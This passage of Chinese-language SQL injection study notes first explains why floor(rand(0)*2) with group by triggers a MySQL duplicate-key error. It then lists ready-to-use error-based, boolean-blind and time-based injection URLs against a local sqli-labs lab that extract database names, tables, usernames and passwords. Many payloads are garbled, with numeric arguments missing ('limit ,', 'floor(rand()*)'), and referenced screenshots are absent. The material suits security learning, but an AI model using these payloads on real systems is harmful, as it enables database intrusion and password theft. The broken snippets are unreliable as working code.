5.将之前的rand()函数和floor函数结合起来
6.查询出来的名字太长,我们来起个别名
7.我们再一次查询,information_schema.tables有多少个表格,会显示多少列
8.group by依据我们想要的规矩对结果进行分组
9.count()统计元素的个数
10.我们多重复几次
0x02:rand()和rand(0)
1.根据刚才的运行结果,发现不加随机因子,执行2次就会报错,我们加上随机因子
看一下结果:
发现每一次都报错,是不是说明报错语句有了floor(rand(0)*2)以及其他条件就一定报错,
验证一下,先建个表test,先只增加一条记录:
然后我们执行报错语句:
多次执行均没有发现报错
我们新增一条记录:
我们继续执行报错语句:
多次执行还是没有发现报错
我们再新增一条记录:
我们测试一下报错语句:
成功报错了
由此证明floor(rand(0)*2)的报错是有条件的,记录数必须大于等于3条,3条以上必定报错
0x03 确定性与不确定性
根据上面的验证,我们发现:
floor(rand()*2):二条记录随机出错
floor(rand(0)*2):三条记录以上一定报错
由此可以猜想,floor(rand()*2)是比较随机的,不具备确定性因素,而floor(rand(0)*2)具备某方面的确定性
floor(rand(0)*2) :报错的原理恰恰是由于他的确定性
我们分别执行观察:
floor(rand()*2):
发现连续三次查询,没有一点规律
floor(rand(0)*2) :
发现连续三次查询都是有规律的,而且是固定的,这就是上面说的由于确定性才导致的爆错
0x04 count与group by的虚拟表
我们先看下来查询结果:
可以看出test5的记录有3条
与count(*)的结果相符合,如果mysql遇到了select count(*) from test group by name;
这种语句,会先建立一个虚拟表:
可这怎么引起报错?
0x05 floor(rand(0)*2)爆错
其实官方mysql给过提示,就是查询如果使用rand()的话,该值会被计算多次,也就是在使用group by 的时候,floor(rand(0)*2)会被执行一次,如果虚拟表中不存在记录,把数据插入虚拟表中时会再被执行一次。在0x03中我们发现floor(rand(0)*2)的值具有确定性,为01101100111011,报错实际上是floor(rand(0)*2)被多次计算所导致,具体看一下select count(*) from test group by floor(rand(0)*2);
1.查询前会建立虚拟表
2.取第一条记录,执行floor(rand(0)*2),发现结果为0(第一次计算),查询虚拟表,发现0的键值不存在,则floor(rand(0)*2)会被再计算一遍,结果为1(第二次计算),插入虚拟表,这时第一条记录查询完毕:
3.查询第二条记录,再次计算floor(rand(0)*2),发现结果为1(第三次计算),查询虚拟表,发现1的键值存在(上图),所以floor(rand(0)*2)不会被计算第二次,直接count(*)+1,第二条记录查询完毕:
4.查询第三条记录,再次计算floor(rand(0)*2),发现结果为0(第四次计算),查询虚拟表,发现0的键值不存在,则虚拟表尝试插入一条新的数据,在插入数据时floor(rand(0)*2)被再次计算,结果为1(第五次计算),然而1这个主键已经存在于虚拟表中,而新计算的值也为1(应为主键键值必须唯一),所以插入时直接报错了。
5.整个查询过程floor(rand(0)*2)被计算了5次,查询了3次纪录,这就是为什么数据表中需要3条数据,这也就是使用该语句会报错的原因
0x06 flood(rand()*2)爆错
由0x01,0x02我们发现flood(rand()*2),具有随机性,
最重要的是前面几条记录查询后不能让虚拟表存在0,1键值,如果存在了,那无论多少条记录都无法报错,应为floor(rand()*2)不会再被计算作为虚拟表的键值,这也就是为什么不加随机因子的时候会报错,有时候不报错:
这样的话,就算查询多少条记录,都不会再次被计算,只是简单的count(*)+1,所以不会报错
比如floor(rand(1)*2):
前两条记录查询过之后,虚拟表中已经存在0,1的键值了,所以后面只会在count(*)上面加,后面不会再爆错
这就是floor型报错注入的原理与过程
--------------------------------------------------------------------------------
select schema_name from information_schema.schemata;
爆出数据库中所有表名:
select table_name from information_schema.tables;
select column_name from information_schema.columns where table_name='wp_users';
select table_name,table_schema from information_schema.tables group by table_schema;
select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*))name;
0x3a是 :的16进制
select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*))name from information_schema.tables group by name;
但是这个错误却爆出了当前数据库名,这对我们SQL注入是有用的,同理,我们可以换成不同的函数来获取信息
select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*))name from
information_schema.tables group by name;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit ,),0x3a,0x3a,floor(rand()*))name from information_schema.tables group by name;
select * from table limit m,n
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
1、通过floor报错,注入语句如下:
爆数据库:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆表:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆字段:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆用户名:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 爆密码:
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23 、通过ExtractValue报错,注入语句如下:
爆数据库:
and extractvalue(, concat(0x5c, (select database()),0x5c)); 爆表:
and extractvalue(, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit ,),0x5c)); 爆字段:
and extractvalue(, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit ,),0x5c)); 爆用户:
and extractvalue(, concat(0x5c, (select username from users limit ,),0x5c)); 爆密码: and extractvalue(, concat(0x5c, (select password from users limit ,),0x5c)); 、通过UpdateXml报错,注入语句如下: 爆数据库: and =(updatexml(,concat(0x3a,(select database()),0x3a),)) 爆表:
and =(updatexml(,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit ,),0x3a),)) 爆字段:
and =(updatexml(,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit ,),0x3a),)) 爆用户:
and =(updatexml(,concat(0x3a,(select username from users limit ,),0x3a),)) 爆密码:
and =(updatexml(,concat(0x3a,(select password from users limit ,),0x3a),)) 4.通过geometrycollection()报错,注入语句如下: select * from test where id= and geometrycollection((select * from(select * from(select user())a)b)); 5.通过multipoint()报错,注入语句如下: select * from test where id= and multipoint((select * from(select * from(select user())a)b)); 6.通过polygon()报错,注入语句如下: select * from test where id= and polygon((select * from(select * from(select user())a)b)); 7.通过multipolygon()报错,注入语句如下: select * from test where id= and multipolygon((select * from(select * from(select user())a)b)); 8.通过linestring()报错,注入语句如下: select * from test where id= and linestring((select * from(select * from(select user())a)b)); 9.通过multilinestring()报错,注入语句如下: select * from test where id= and multilinestring((select * from(select * from(select user())a)b)); 10.通过exp()报错,注入语句如下: select * from test where id= and exp(~(select * from(select user())a));
left(database(),)>’s’ //left()函数
ascii(substr((select table_name information_schema.tables where tables_schema =database() limit ,),,))= --+
ascii(substr((select database()),,))=98 ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
select user() regexp '^[a-z]';
select user() regexp '^ro'
select * from users where id= and =(if((user() regexp '^r'),,)); select * from users where id=1 and 1=(user() regexp'^ri');
select * from users where id= and =(select from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit ,);
table_name regexp '^username$
If(ascii(substr(database(),,))>,,sleep())%
select sleep(find_in_set(mid(@@version, , ), '0,1,2,3,4,5,6,7,8, 9,.'));
UNION SELECT IF(SUBSTRING(current,,)=CHAR(),BENCHMARK(,ENCODE(‘M SG’,’by seconds’)),null) FROM (select database() as current) as tb1;
http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+
http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+